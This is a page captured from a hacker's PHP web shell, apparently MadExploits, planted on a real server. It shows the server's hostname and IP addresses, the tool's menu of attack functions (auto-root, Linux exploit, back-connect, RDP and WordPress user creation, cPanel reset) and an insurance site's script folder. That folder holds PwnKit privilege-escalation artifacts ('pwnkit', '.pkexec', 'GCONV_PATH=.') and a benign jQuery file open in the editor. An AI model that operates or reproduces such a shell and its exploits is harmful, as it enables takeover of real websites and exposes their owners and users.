Linux dpw.dpwebtech.com 3.10.0-1160.88.1.el7.x86_64 #1 SMP Tue Mar 7 15:41:52 UTC 2023 x86_64
Apache
: 192.232.243.69 | : 3.15.211.55
54 Domain
7.3.33
dpclient
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
dpclient /
public_html /
insurance /
js /
[ HOME SHELL ]
Name
Size
Permission
Action
.pkexec
[ DIR ]
drwxr-xr-x
GCONV_PATH=.
[ DIR ]
drwxr-xr-x
.mad-root
0
B
-rw-r--r--
common-backend.js
1015
B
-rw-r--r--
common-nackend-end-backend.js
1.91
KB
-rw-r--r--
custom.js
2.86
KB
-rw-r--r--
dashbord.js
3.65
KB
-rw-r--r--
email-quotes-backend.js
1.53
KB
-rw-r--r--
helpers.js
23.45
KB
-rw-r--r--
insurance-listing-page.js
7.36
KB
-rw-r--r--
insurer-dashboard-backend.js
8.49
KB
-rw-r--r--
insurer-edit-backend.js
14.16
KB
-rw-r--r--
jquery-3.7.1.min.js
85.48
KB
-rw-r--r--
jquerydatatables2.0.8.min.js
88.28
KB
-rw-r--r--
messages-backend.js
2.28
KB
-rw-r--r--
policy-backend.js
2.96
KB
-rw-r--r--
policy-dashboard-backend.js
2.52
KB
-rw-r--r--
policy-edit-backend.js
2.25
KB
-rw-r--r--
pwnkit
10.99
KB
-rwxr-xr-x
qoutejs.js
7.67
KB
-rw-r--r--
sweetalert.min.js
39.85
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : custom.js
$(document).ready(function () { $(".tabsv1-ul li").click(function () { var tab_id = $(this).attr("data-tab"); $(".tabsv1-ul li").removeClass("current"); $(".tab-content").removeClass("current"); $(this).addClass("current"); $("#" + tab_id).addClass("current"); }); /* cart remove items */ $(".remove-btn").click(function (e) { e.preventDefault(); // Prevent default action of anchor tag $(this).closest(".cart-item-wrap").hide(); }); /* toogle */ $(".filter-heading").click(function () { $(this).parent(".filter-group-item").toggleClass("pb-00"); $(this).toggleClass("arrow-down"); $(this).next(".filter-content").slideToggle("fast"); }); /*client */ if ($(".client-logo").length > 0) { $(".client-logo").owlCarousel({ loop: true, margin: 60, nav: false, dots: false, autoplay: true, autoplayTimeout: 3000, autoplaySpeed: 3000, slideTransition: "linear", autoplayHoverPause: true, responsive: { 0: { items: 1, }, 600: { items: 3, }, 1000: { items: 6, }, }, animateOut: "linear", animateIn: "linear", }); } // // step us next // var currentStep = 0; // var steps = $(".step"); // var progressBarItems = $("#progressbar li"); // // Show the first step // // $(steps[currentStep]).addClass("active"); // $(".btn-next").click(function () { // if (currentStep < steps.length - 1) { // $(steps[currentStep]).removeClass("active"); // $(progressBarItems[currentStep]).removeClass("active"); // currentStep++; // $(steps[currentStep]).addClass("active"); // $(progressBarItems[currentStep]).addClass("active"); // } // }); // $(".btn-prev").click(function () { // if (currentStep > 0) { // $(steps[currentStep]).removeClass("active"); // $(progressBarItems[currentStep]).removeClass("active"); // currentStep--; // $(steps[currentStep]).addClass("active"); // $(progressBarItems[currentStep]).addClass("active"); // } // }); // search function js function searchItems() { let value = $(".searchbox").val().toLowerCase().trim(); let nomatch = $(".no-match"); var anyMatchFound = false; $(".quote-listv1").each(function () { var text = $(this).find(".title-h2").text().toLowerCase(); var match = text.includes(value); $(this).toggle(match); if (match) { anyMatchFound = true; nomatch.css('display', 'none'); } else { nomatch.css('display', 'block'); } }); $("#noMatchMessage").toggle(!anyMatchFound); } $(".searchbox").on("keyup", function () { searchItems(); }); $(".searchbox-container ").on("submit", function (e) { e.preventDefault(); searchItems(); }); // search function end }); //modal js
Close